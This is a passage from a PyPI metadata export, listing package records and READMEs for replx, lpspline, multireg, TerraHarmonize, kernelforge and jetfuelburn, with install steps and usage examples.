] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:21:07.930135 | python_code_quality-0.1.8.tar.gz | 64,655 | f0/33/2c9be68ffd315c14f9209d2f498439a1358129788600ae41fe42103b6fbc/python_code_quality-0.1.8.tar.gz | source | sdist | null | false | 8220c1ce25b89015ae1d1d43b15e83bb | a7b099edfee7e707ad72f5e28506505a12e15a88e7d262e05a7e8833c8412bd4 | f0332c9be68ffd315c14f9209d2f498439a1358129788600ae41fe42103b6fbc | MIT | [
"LICENSE"
] | 203 |
2.4 | replx | 1.2 | replx is a fast, modern MicroPython CLI: turbo REPL, robust file sync (put/get), project install, mpy-cross integration, and smart port discovery. | # replx
[](https://badge.fury.io/py/replx)
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
`replx` is a CLI tool for MicroPython development. It uses an agent-based architecture to manage multiple CLI sessions and multiple boards in a consistent workflow.
## What replx provides
- Shared connection management across terminal sessions
- Foreground and background board handling per session
- Workspace-level default device configuration
- File operations on device storage
- Script execution, REPL access, and utility commands
## Installation
```sh
pip install replx
```
## Command summary
### Connection and session
- `setup`: Initialize workspace settings and register a default device.
- `scan`: List available serial devices.
- `status`: Show session and connection state.
- `fg`: Change the foreground device for the current session.
- `whoami`: Show the current foreground device.
- `disconnect`: Close a device connection.
- `shutdown`: Stop the agent and clear active sessions.
### Execution and interaction
- `exec` (`-c`): Execute inline Python code on the device.
- `run`: Run a local or device-side script.
- `repl`: Open an interactive REPL session.
- `shell`: Open a device file-system shell.
### File operations
- `ls`: List files and directories.
- `cat`: Print file content.
- `get`: Download files from device to local.
- `put`: Upload files from local to device.
- `cp`: Copy files or directories on device.
- `mv`: Move or rename files or directories on device.
- `rm`: Remove files or directories on device.
- `mkdir`: Create directories on device.
- `touch`: Create an empty file or update timestamps.
### Device management
- `usage`: Show device storage usage.
- `reset`: Perform a soft reset.
- `format`: Format the device file system.
- `init`: Run initialization scripts on device.
- `wifi`: Manage Wi-Fi configuration and status.
- `firmware`: Check, download, or update firmware.
### Package and build
- `pkg`: Search, download, and update packages.
- `mpy`: Compile `.py` files to `.mpy`.
## Notes
- `scan`, `status`, `whoami`, and `shutdown` are special commands and do not accept `--port`.
- Most device commands can omit the port when a foreground or workspace default device is available.
## License
MIT
| text/markdown | null | "chanmin.park" <devcamp@gmail.com> | null | null | null | micropython, repl, serial, pyserial, typer, mpy-cross, deploy | [
"Environment :: Console",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Operating System :: OS Independent",
"Topic :: Software Development :: Embedded Systems",
"Topic :: System :: Hardware :: Universal Serial Bus (USB)"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"typer>=0.12",
"rich>=13.0",
"pyserial>=3.5",
"mpy-cross>=1.26",
"psutil>=5.9.0"
] | [] | [] | [] | [
"Homepage, https://github.com/PlanXLab/replx",
"Repository, https://github.com/PlanXLab/replx",
"Issues, https://github.com/PlanXLab/replx/issues"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:20:57.244614 | replx-1.2.tar.gz | 265,772 | 16/80/9826292012cc37bf7dcd2cedc2aeb9b6e561987942e3fa1cb42e7fc80f45/replx-1.2.tar.gz | source | sdist | null | false | e07616e7f8d23cd0b18f73caad12fd14 | dba0bc5f99cd33449afbd3552a3e8405efb357f1eba7b8b3c401029997a20bd6 | 16809826292012cc37bf7dcd2cedc2aeb9b6e561987942e3fa1cb42e7fc80f45 | MIT | [
"LICENSE"
] | 218 |
2.4 | lpspline | 0.0.3 | lpspline | # LPSpline
LPSpline is a Python package for building and optimizing linear spline models using an intuitive additive API. It provides a flexible way to model non-linear relationships using various spline types like Piecewise Linear, B-Splines, Cyclic Splines, and Categorical Factors.
## Installation
Install `lpspline` via pip directly from the repository, or if published:
```bash
pip install lpspline
```
## Quick Start
LPSpline allows you to easily compose additive models. Here's a quick example:
```python
import numpy as np
import polars as pl
from lpspline import l, pwl, bs
# ---------------------------------------- Data Generation
n = 1000
# Regressors
x_linear = np.linspace(0, 10, n)
x_pwl = np.linspace(0, 10, n)
x_bs = np.linspace(0, 10, n)
x_cyc = np.linspace(0, 2*np.pi, n)
x_factor = np.random.randint(0, 3, n)
# Target
y_linear = 0.5 * x_linear
y_pwl = np.where(x_pwl < 5, 0, x_pwl - 5)
y_bs = np.sin(x_bs)
y_cyc = np.cos(x_cyc)
y_factor = np.array([0, 2, -1])[x_factor]
y = y_linear + y_pwl + y_bs + y_cyc + y_factor + np.random.normal(0, 0.2, n)
df = pl.DataFrame({
"linear_col": x_linear,
"pwl_col": x_pwl,
"bs_col": x_bs,
"cyc_col": x_cyc,
"factor_col": x_factor,
"target": y
})
# ---------------------------------------- Model Definition
model = (
l(term='linear_col', bias=True)
+ pwl(term='pwl_col', knots=[5.])
+ bs(term="bs_col", knots=np.linspace(0, 10, 5), degree=3)
+ cs(term="cyc_col", period=2*np.pi, order=2)
+ f(term="factor_col", n_classes=3)
)
# ---------------------------------------- Model Fitting
model.fit(df, df["target"])
# ---------------------------------------- Model Prediction
predictions = model.predict(df)
# ---------------------------------------- Model Visualization
plot_components(model=model, df=df, ncols=3)
```
## Expected output
Once the model is fitted, you will see a detailed summary to the console:
```
==================================================
✨ Model Summary ✨
==================================================
Problem Status: ✅ optimal
--------------------------------------------------
Spline Type | Term | Params
--------------------------------------------------
🟢 Linear | linear_col | 2
🟢 PiecewiseLinear | pwl_col | 3
🟢 BSpline | bs_col | 1
🟢 CyclicSpline | cyc_col | 5
🟢 Factor | factor_col | 3
--------------------------------------------------
📊 Total Parameters | 14
==================================================
Model fitted successfully.
```

| text/markdown | clarkmaio | maioliandrea0@gmail.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Visualization"
] | [] | https://github.com/clarkmaio/lpspline | null | >=3.10 | [] | [] | [] | [
"polars",
"cvxpy",
"pimpmyplot",
"matplotlib"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.10.9 | 2026-02-20T09:19:41.341427 | lpspline-0.0.3.tar.gz | 11,668 | 1b/d8/dc0ec42c2790db65c3e4443f2c76e73bd1f475bc6a9b36ab7fc7fcd761e4/lpspline-0.0.3.tar.gz | source | sdist | null | false | 966cefbd8476d249b70fdeaab3fddea7 | f633cd817b50561c3866e88ee8be32945495bd68b7e5f21ab9f4b2cac3758819 | 1bd8dc0ec42c2790db65c3e4443f2c76e73bd1f475bc6a9b36ab7fc7fcd761e4 | null | [
"LICENSE"
] | 213 |
2.1 | multireg | 0.0.19 | Registration of 3D multiplex images with one common channel | # multireg
[](https://gitlab.pasteur.fr/gletort/multireg/blob/main/LICENSE)
[](https://pypi.org/project/multireg)
[](https://python.org)
[](https://napari-hub.org/plugins/multireg)
Registration of 3D multiplex images with one common chanel, based on itk-elastix.
Napari plugin to align 3D stacks that have one common field of view in one chanel used to calculate the alignement. The plugin will apply the registration to all other chanels and output one final stack with all the aligned chanels.
The stacks **must have one common chanel** (typically cell junctions and nuclei) that is used to calculate the registration transformation. It can be rotated, translated, deformed, and with a wider field of view.
Then the calculated transformation is applied to all the other chanels for each stack.
The final result is **one multi-chanel 3D stack**, with the first chanel being an average (or not) of the common chanel and each other chanel the registered chanels from the multiple stacks. The common chanel can be averaged between the different chanels, which improves its quality.
The plugin save and load files to a folder named `aligned` and created in the same directory as the source images.
Example of usage of this module is in the case of imaging the same cells with washing out or moving the sample in between. The corresponding cells will not be at the same position in the new stacks, and can even be deformed by the procedure. This plugin realign the images based on one common chanel on which the transformation is calculated.
----------------------------------
## Installation
* You can install the plugin directly in `Napari` by going to `Plugins>Install/Uninstall plugins` and search for `multireg`
* Or you can install `multireg` via [pip]:
pip install multireg
## Usage
You can launch `multireg` in napari by going to `Plugins>multireg: do multiplex registration`.
### Fixed image
It will open a prompt to ask you to select the reference (fixed) image, compared to which all other images will be aligned.
Then you have to choose the `reference chanel` that will be used in all the stacks to calculate the alignement. So this chanel should be common to all stacks.

#### Reference points
The first part of the registration relies on reference points manually selected, because the common field of view can be quite far from each other in the acquisition. So first a affine registration is applied to bring close the region of interest between the two stacks to match.
<br> *Note that if your stacks did not move a lot then you could calculate the transformation without using the reference points. There's an option in the alignement calculation panel for this.*

You have to manually placed a few reference points (4-5 should be enough). Try to spread them in the image (in x,y and z) on landmarks to recognize them in other images.
To add a new reference point, click on the "plus" sign in the left panel. To select one, click on the arrow icon (or press 3), then on the point. You can move the point in x and y. To move it in z, press `u` for up and `d` for down.
When all points are placed, save them. The **points have to be saved** to be correctly loaded by the alignement calculation step.
Then click on `Fixed points done` to continue to the next step.
### Moving images
Then you can choose one of the images you want to align with the reference image. Its chanel that is common to the fixed image should be the same chanel, selected in the first step (the `reference chanel`). Select the file of the moving image to align by clicking on `select file`. This will open the new image and go to the step of placing the moving points in this image.
When you will have process all the moving images, you can click on `All done` to finish the plugin by creating the [resulting stack](#create-resulting-image).

#### Moving points
You now have to locate where the region of interest (the fixed image) is in your new image and find the landmarks referenced in the fixed image are in this new image. This allows the plugin to put together the region of interest in the two images in a first step, before to fine-tune the registration.
For each point placed in the fixed image, place the corresponding point in the moving image. By default, the moving points are placed close to the fixed points.
* Each point must have the same label (number) as its corresponding fixed points to associate them correctly. You can change a point label by selecting it and putting the new value in `param` and clicking on `update`.
* When a point is selected, you can drag it to its desired location. To move it in the Z direction, you can press `u` to move it to the next Z (up direction) and `d` (down) to the previous Z. The viewed slice will also move, following the point new position, when you do so.
* You can click on `side_by_side_view` to see the two images (fixed and moving) with their placed points at the same time.
* You can click on `two_windows_view` to see the fixed image and points in a separate Napari window. This allows to have visualize separatly the fixed and moving images and points, and thus to see different z-slices or zoom for each image. The new window will be closed automatically by the plugin if you unselect this option or when you click on `Moving done`.

When all the moving points have been correctly placed, click on `Save points` to save this positions and let it be usable by the alignement step. The points **have to be saved** in the point file to be correctly loaded in the alignement step.
### Alignement calculation
This step is the core of the plugin. The transformation necessary to change the moving image to match with the fixed image on the `reference chanel` is calculated based on [itk-elastix](https://pypi.org/project/itk-elastix/) python module. It is decomposed in two steps.
1. First a global **affine registration** is performed, based on the correspondance between the reference and moving points (`do rigid` option). This allows to locate the fixed image postion within the moving image and apply a first **shearing, scaling, rotation and translation** to super-impose the region of interest.
2. The second step fine-tunes the registration. It doesn't use the reference points (except if rigid transformation was not selected) anymore but calculate the matching based on the images local intensities. **Non-rigid transformation** based on B-spline is performed at this step, thus allowing to compensate for **local deformations** in the moving image (`do bspline` option).
The option `use reference points` determines if the previously placed reference points should be used or if the registration is only based on intensities matching. It's possible to use only the intensities if the two images are not so far away from each other. The reference points will be used only in the first pass (either rigid or bspline) when both are selected. If only one is selected, the points will be used on the selected transformation.
The option `strong_weight_points` allows to give more importance to reference points than to intensities matching when calculating the registration. The weights will be 0.2 for the intensity metric and 0.8 for points metric. Note that if both rigid and bspline transformations are selected, the second transformation (bspline) do not use the points.

You can click on `show advanced parameters` to tune the parameters of the non rigid transformation. After calculating the registration, the plugin will add a new layer, which is the moving image after alignement, so you can check the sucess of the regristration. `show intermediate_layer` will also add the moving image aligned after the first step only (the points matching with affine registration).

### Apply alignement
Once the calculated registration is satisfying, you can apply it to all the chanels of your moving image, or only to a few. By default, all chanels are selected in the `Apply alignement` panel, but you can unselect the chanels that you don't want to align in the parameter `align chanels`.
When you click on `Align images`, the plugin will apply the transformation on the selected chanels of the moving image and save each of them in the `aligned` folder as individual `.tif` files.

### Create resulting image
This step allows to save a single 3D multi-chanels stack with all the aligned chanels.
The common chanel present in all the images can be averaged together after alignement to obtain a much less noisy image. By default, the aligned `reference chanel` of all the images are averaged together to create the final image first chanel. However, it is possible to unselect some images in the first panel (`average chanels` parameter) if you do not wish to use all the images or do an average.

Then each aligned chanel of all the images that were not the reference chanel are stacked together in the final resulting image. Here also, if you don't want to keep all the other chanels in the resulting image, you can unselect the one that you don't want stacked, in the `add_chanels` parameter.
All the aligned chanels have been previously saved in the `aligned` folder. If `delete_files` is checked (default) all these interemediate files will be deleted and only the final resulting stack will be saved in that folder.
You will end-up with a final 3D multi-chanels stack, saved as a `.tif` file in the `aligned` folder, with the same name as your fixed image. It can have a lot of chanels if you stacked together multiple images.
In napari, you can separate the chanels by right clicking on the layer and select `Split stack`.
In Fiji, you can make the stack as a composite to see the chanels with different colors.

## License
Distributed under the terms of the [BSD-3] license,
"multireg" is free and open source software
## Plugin initialization
This [napari] plugin was generated with [Cookiecutter] using [@napari]'s [cookiecutter-napari-plugin] template.
## Issues
If you encounter any problems, please [file an issue] along with a detailed description.
[napari]: https://github.com/napari/napari
[Cookiecutter]: https://github.com/audreyr/cookiecutter
[@napari]: https://github.com/napari
[MIT]: http://opensource.org/licenses/MIT
[BSD-3]: http://opensource.org/licenses/BSD-3-Clause
[GNU GPL v3.0]: http://www.gnu.org/licenses/gpl-3.0.txt
[GNU LGPL v3.0]: http://www.gnu.org/licenses/lgpl-3.0.txt
[Apache Software License 2.0]: http://www.apache.org/licenses/LICENSE-2.0
[Mozilla Public License 2.0]: https://www.mozilla.org/media/MPL/2.0/index.txt
[cookiecutter-napari-plugin]: https://github.com/napari/cookiecutter-napari-plugin
[napari]: https://github.com/napari/napari
[tox]: https://tox.readthedocs.io/en/latest/
[pip]: https://pypi.org/project/pip/
[PyPI]: https://pypi.org/
| text/markdown | Gaëlle Letort | gaelle.letort@pasteur.fr | null | null | BSD 3-Clause License Copyright (c) 2023, Gaëlle LETORT All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | null | [
"Framework :: napari",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering :: Image Processing"
] | [] | https://gitlab.pasteur.fr/gletort/multireg | null | >=3.9 | [] | [] | [] | [
"napari<=0.4.18",
"numpy",
"magicgui",
"qtpy",
"pyqt5",
"tifffile",
"imaris_ims_file_reader",
"czifile",
"itk==5.3.0",
"itk-registration",
"itk-elastix"
] | [] | [] | [] | [
"Bug Tracker, https://gitlab.pasteur.fr/gletort/multireg/issues",
"Documentation, https://gitlab.pasteur.fr/gletort/multireg#README.md",
"Source Code, https://gitlab.pasteur.fr/gletort/multireg"
] | twine/5.0.0 CPython/3.12.3 | 2026-02-20T09:19:41.044522 | multireg-0.0.19.tar.gz | 2,228,670 | 7e/81/8775081b46df8b98e57bb69a7ff745673e4ae4bb58f7111086a6f1f7fb4a/multireg-0.0.19.tar.gz | source | sdist | null | false | be34ff5ab4ac5314ff24c12d34ab80fb | 92310a479d1639e7cab42839b3abc5c6e803b7dfc921eb87c729ff670627889a | 7e818775081b46df8b98e57bb69a7ff745673e4ae4bb58f7111086a6f1f7fb4a | null | [] | 224 |
2.4 | TerraHarmonize | 0.1.5 | A powerful and efficient package designed for the SatSure Sage GIS team, enabling precise and seamless POC matching and D1-D2 matching across all states. | TerraHarmonize 🌍
🚀 Seamless & Accurate POC and D1-D2 Matching for All States
This package was built for SatSure SAGE 🛰️ to effortlessly match client data with internal datasets for proof-of-concept (POC) validation.
Whether you're working with geospatial surveys, land records, or administrative data, TerraHarmonize ensures precision, efficiency, and scalability across all states.
✨ Key Features:
✅ Fast & accurate POC matching 🏹
✅ Handles diverse data formats 📊
✅ Designed for scalability & performance ⚡
### Installation
```sh
pip install TerraHarmonize
```
### Examples
For changing regional character to English.
```python
from TerraHarmonize import TextFormatters,SurveyMatching
>>> string = '12/अ/1'
>>> print(TextFormatters.regional_to_english_village(string,'Hi'))
'12/A/1'
```
For getting the index of the best match.
```python
from TerraHarmonize import TextFormatters,SurveyMatching
>>> string = '13/A1'
>>> comparing_list = ['13/A1','14/A/1','12/A/1','13/అ','13-అ/1']
#correct matching is [0,3,4] index i.e. '13/A1','13/అ','13-అ/1'
>>> print(SurveyMatching(string,comparing_list).poc_matching_simple(split_pattern= r"\/|\-"))
[0]
>>> print(SurveyMatching(string,comparing_list).poc_matching(include='both',state='AP'))
[0, 3, 4]
```
Adding **/** inbetween a number and an alphabet.
```python
from TerraHarmonize import TextFormatters,SurveyMatching
>>> data = '13/1AA/BB1/E'
>>> updated_data = TextFormatters.normalize_alpha_num_slash(data,'En')
>>> print(updated_data)
'13/1/AA/BB/1/E'
```
```python
>>> data = {
"district": ["District A", "District B", "District C"],
"tehsil": ["Tehsil X", "Tehsil Y", "Tehsil Z"],
"village": ["Village 1", "Village 2", "Village 3"],
"survey_number_client": ["13/1/अ", "23/2A", "789/1"],
"survey_number_satsure": [["13/1", "13/1/A", "13/2/1"], ["456A", "23/2", "23/2/अ"], ["324/1", "121/2"]],
"survey_id": [["ID_1", "ID_2", "ID_3"], ["ID_4", "ID_5", "ID_6"], ["ID_7", "ID_8"]]
}
>>> df = pd.DataFrame(data)
>>> matching = SurveyMatching.poc_matching_dataframe(df,'survey_number_client',
'survey_number_satsure','survey_id',
include='both',
state='MH').fillna('missing')
```
📖 **More Examples & Usage** https://github.com/CM-SS155/TerraHarmonize-Docs
| text/markdown | chandramohan | chandramohan@satsure.co | null | null | GPLv3 | SatSure, TerraHarmonize, Sage, POC | [
"License :: Other/Proprietary License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10"
] | [] | null | null | <3.11,>=3.9 | [] | [] | [] | [
"fuzzywuzzy==0.18.0",
"numpy<2.0,>=1.24",
"pandas<2.2,>=2.0"
] | [] | [] | [] | [
"Documentation, https://terraharmonize-docs.readthedocs.io/en/latest/index.html"
] | poetry/2.3.2 CPython/3.10.14 Linux/6.8.0-100-generic | 2026-02-20T09:18:13.925877 | terraharmonize-0.1.5-py3-none-any.whl | 22,895 | 8b/9a/e27eb9a943b9abc56d386ba2e9e0b3a058585f93738dd8c0497dba0e15ac/terraharmonize-0.1.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 49638cea8517839d6e794fbbc984ac3d | 73ebbff711cd4a5b3fa6632e777ee1c8b4c0a58d2ec508c82089adf81729469e | 8b9ae27eb9a943b9abc56d386ba2e9e0b3a058585f93738dd8c0497dba0e15ac | null | [
"LICENSE"
] | 0 |
2.2 | kernelforge | 0.1.19 | Optimized Kernels for ML | # KernelForge - Optimized Kernels for ML
[](https://github.com/andersx/kernelforge/actions/workflows/ci.yml)
[](https://github.com/andersx/kernelforge/actions/workflows/code-quality.yml)
[](https://pypi.org/project/kernelforge/)
[](https://pypi.org/project/kernelforge/)
[](https://github.com/andersx/kernelforge)
[](https://opensource.org/licenses/MIT)
I really only care about writing optimized kernel code, so this project will be completed as I find additional time... XD
I'm reviving this project to finish an old project using random Fourier features for kernel ML.
# Installation
## Quick Start (Recommended)
For most users, install from PyPI:
```bash
pip install kernelforge
```
This installs pre-compiled wheels with optimized BLAS libraries:
- **Linux**: OpenBLAS
- **macOS**: Apple Accelerate framework
**Requirements**: Python 3.10+
## Development Installation
### Linux
```bash
# Create virtual environment with uv
uv venv
source .venv/bin/activate
# Install in editable mode with test dependencies
make install-linux
# Or manually:
CMAKE_ARGS="-DKF_USE_NATIVE=ON" uv pip install -e .[test] --verbose
```
### macOS
macOS requires Homebrew LLVM for OpenMP support:
```bash
# Install dependencies
brew install llvm libomp
# Create virtual environment
uv venv
source .venv/bin/activate
# Install in editable mode
make install-macos
# Or manually:
CMAKE_ARGS="-DCMAKE_C_COMPILER=/opt/homebrew/opt/llvm/bin/clang -DCMAKE_CXX_COMPILER=/opt/homebrew/opt/llvm/bin/clang++ -DKF_USE_NATIVE=ON" uv pip install -e .[test] --verbose
```
**Note**: The `-DKF_USE_NATIVE=ON` flag enables `-march=native`/`-mcpu=native` optimizations for maximum performance on your specific CPU.
## Advanced: Custom BLAS/LAPACK Libraries
### Intel MKL (Linux)
```bash
# Install Intel oneAPI Base Toolkit
sudo apt install intel-basekit
# Set up environment
source /opt/intel/oneapi/setvars.sh
# Install (MKL will be auto-detected by CMake)
uv pip install -e .[test] --verbose
# Optional: Use Intel compilers
CC=icx CXX=icpx uv pip install -e .[test] --verbose
```
**Note**: In practice, GCC/G++ with OpenBLAS performs similarly to (or better than) Intel compilers with MKL. On macOS, LLVM with Accelerate framework is highly optimized for Apple Silicon.
## Timings
I've rewritten a few of the kernels from the original QML code completely in C++.
There are performance gains in most cases.
These are primarily due to better use of BLAS routines for calculating, for example, Gramian sub-matrices with chunked DGEMM/DSYRK calls, etc.
In the gradient and Hessian matrices there are also some algorithmic improvement and pre-computed terms.
Memory usage might be a bit higher, but this could be optimized with more fine-graind chunking if needed.
More is coming as I find the time ...
Some speedups vs the original QML code are shown below:
| Benchmark | QML [s] | Kernelforge [s] |
|:---------------|------------:|--------------------:|
| Upper triangle Gaussian kernel (16K x 16K) | 1.82 | 0.64 |
| 1K FCHL19 descriptors (1K) | ? | 0.43 |
| 1K FCHL19 descriptors+jacobian (1K) | ? | 0.62 |
| FCHL19 Local Gaussian scalar kernel (10K x 10K) | 76.81 | 18.15 |
| FCHL19 Local Gaussian gradient kernel (1K x 2700K) | 32.54 | 1.52 |
| FCHL19 Local Gaussian Hessian kernel (5400K x 5400K) | 29.68 | 2.05 |
## TODO list
The goal is to remove pain-points of existing QML libraries
- Removal of Fortran dependencies
- No Fortran-ordered arrays
- No Fortran compilers needed
- Simplified build system
- No cooked F2PY/Meson build system, just CMake and Pybind11
- Improved use of BLAS routines, with built-in chunking to avoid memory explosions
- Better use of pre-computed terms for single-point inference/MD kernels
- Low overhead with Pybind11 shims and better aligned memory?
- Simplified entrypoints that are compatible with RDKit, ASE, Scikit-learn, etc.
- A few high-level functions that do the most common tasks efficiently and correctly
- Efficient FCHL19 out-of-the-box
- Fast training with random Fourier features
- With derivatives
## Priority list for the next months:
- [x] Finish the inverse-distance kernel and its Jacobian
- [x] Make Pybind11 interface
- [ ] Finalize the C++ interface
- [x] Finish the Gaussian kernel
- [x] Notebook with rMD17 example
- [x] Finish the Jacobian and Hessian kernels
- [x] Notebook with rMD17 forces example
- FCHL19 support:
- [x] Add FCHL19 descriptors
- [x] Add FCHL19 kernels (local/elemental)
- [x] Add FCHL19 descriptor with derivatives
- [x] Add FCHL19 kernel Jacobian
- [x] Add FCHL19 kernel Hessian (GDML-style)
- [ ] Improve FCHL19 kernel Jacobian performance (its poor)
- Finish the random Fourier features kernel and its Jacobian
- [ ] Parallel random basis sampler
- [ ] RFF kernel for global descriptors
- [ ] SVD and QR solvers for rectangular matrices
- [ ] RFF kernel for local descriptors (FCHL19)
- [ ] RFF kernels with Cholesky solver and chunked DSYRK kernel updates
- [ ] RFF kernels with RFP format with chunked DSFRK kernel updates
- [ ] RFF kernel Jacobian for global descriptors
- [ ] RFF kernel Jacobian for local descriptors (FCHL19)
- [ ] Notebook with rMD17 random Fourier features examples
- Science:
- Benchmark full kernel vs RFF on rMD17 and QM7b and QM9
- Both FCHL19 and inverse-distance matrix
#### Todos:
- Houskeeping:
- [x] Pybind11 bindings and CMake build system
- [x] Setup CI with GitHub Actions
- [x] Rewrite existing kernels to C++ (no Fortran)
- [x] Setup GHA to build PyPI wheels
- [x] Test Linux build matrices
- [x] Test MacOS build matrices
- [ ] Test Windows build matrices
- [x] Add build for all Python version >=3.11
- [ ] Plan structure for saving models for inference as `.npz` files
- Ensure correct linking with optimized BLAS/LAPACK libraries:
- [x] OpenBLAS (Linux) <- also used in wheels
- [x] MKL (Linux)
- [x] Accelerate (MacOS)
- Add global kernels:
- [x] Gaussian kernel
- [x] Jacobian/gradient kernel
- [ ] Optimized Jacobian kernel for single inference
- [x] Hessian kernel
- [x] GDML-like kernel
- [ ] Full GPR kernel
- Add local kernels:
- [x] Gaussian kernel
- [x] Jacobian/gradient kernel
- [x] Optimized Jacobian kernel for single inference
- [x] Hessian kernel (GDML-style)
- [ ] Full GPR kernel
- [ ] Optimized GPR kernel with pre-computed terms for single inference/MD
- Add random Fourier features kernel code:
- [ ] Fourier-basis sampler
- [ ] RFF kernel
- [ ] RFF gradient kernel
- [ ] RFF chunked DSYRK kernel
- [ ] Optimized RFF gradient kernel for single inference/MD
- The same as above, just for Hadamard features when I find the time?
- GDML and sGDML kernels:
- [x] Inverse-distance matrix descriptor
- [ ] Packed Jacobian for inverse-distance matrix
- [x] GDML kernel (brute-force implemented)
- [ ] sGDML kernel (brute-force implemented)
- [ ] Full GPR kernel
- [ ] Optimized GPR kernel with pre-computed terms for single inference/MD
- FCHL18 support:
- [ ] Complete rewrite of FCHL18 analytical scalar kernel in C++
- [ ] Stretch goal 1: Add new analytical FCHL18 kernel Jacobian
- [ ] Stretch goal 2: Add new analytical FCHL18 kernel Hessian (+GPR/GDML-style)
- [ ] Stretch goal 3: Attempt to optimize hyperparameters and cut-off functions
- Add standard solvers:
- [x] Cholesky in-place solver
- [x] L2-reg kwarg
- [x] Toggle destructive vs non-destructive
- [ ] QR and/or SVD for non-square matrices
- Add moleular descriptors with derivatives:
- [ ] Coulomb matrix + misc variants without derivatives
- [x] FCHL19 + derivatives
- [x] GDML-like inverse-distance matrix + derivatives
#### Stretch goals:
- [ ] Plan RDKit interface
- [ ] Plan Scikit-learn interface
- [ ] Plan ASE interface
| text/markdown | Anders Christensen | null | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Chemistry"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=2.00",
"typing-extensions>=4.0.0; python_version < \"3.11\"",
"pytest>=8; extra == \"test\"",
"pytest-xdist; extra == \"test\"",
"pytest-timeout; extra == \"test\"",
"ruff>=0.8.0; extra == \"dev\"",
"ty; extra == \"dev\"",
"pre-commit>=3.6.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/andersx/kernelforge",
"Issues, https://github.com/andersx/kernelforge/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:18:10.536533 | kernelforge-0.1.19.tar.gz | 3,374,399 | 93/33/1fc378e155c7b0a5f2bd5f8039157c923c87a59ee0f784bfb169386465ff/kernelforge-0.1.19.tar.gz | source | sdist | null | false | f09e3aaddb73e2d0d019105c588bd666 | 7a2b423d05f65b49c527e6e85faef5e157870c83b3708ca9403b017d757fa70c | 93331fc378e155c7b0a5f2bd5f8039157c923c87a59ee0f784bfb169386465ff | null | [] | 753 |
2.4 | jetfuelburn | 2.0.1 | A Python package for calculating fuel burn of commercial aircraft. | # JetFuelBurn
[](h[ttps://pypi.org/project/jetfuelburn/](https://pypistats.org/packages/jetfuelburn))
[](https://pypi.org/project/jetfuelburn/)

[](https://pypi.org/project/jetfuelburn/)
[](https://github.com/psf/black)
A Python package for calculating fuel burn of commercial aircraft.
Maintainance Team: [@michaelweinold](https://github.com/michaelweinold)
## Installation
See [the package documentation](https://jetfuelburn.readthedocs.io/) for installation instructions.
## Development
### Documentation
The package documentation is based on [`mkdocs`](https://www.mkdocs.org). To build the documentation locally, install required packages from the `docs/_requirements.txt` file and navigate to the package root directory to execute:
```bash
mkdocs serve
```
### Testing
Package tests are based on [`pytest`](https://docs.pytest.org/en/stable/). To run all tests, navigate to the package root directory and execute:
```bash
pytest
```
When developing with Visual Studio Code, test can also be run from [the Test Explorer sidebar](https://code.visualstudio.com/docs/python/testing).
### CI/CD
The package uses [GitHub Actions](https://github.com/features/actions) for continuous integration and deployment. The CI/CD pipeline is defined in the `.github/workflows` directory.
| Workflow | Description | Trigger |
|----------|-------------|---------|
| `.github/workflows/test_package.yml` | Runs all tests. | Every new pull request and push to the `main` branch. |
| `.github/workflows/publish_testpypi.yml` | Runs all tests and uploads the package to TestPyPI. | Every new version `tag`. |
| `.github/workflows/publish_pypi.yml` | Runs all tests and uploads the package to PyPI. | Every new version `release`. |
| text/markdown | null | Michael Weinold <michaelphilippweinold+jetfuelburn@gmail.com> | null | Michael Weinold <michaelphilippweinold+jetfuelburn@gmail.com> | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
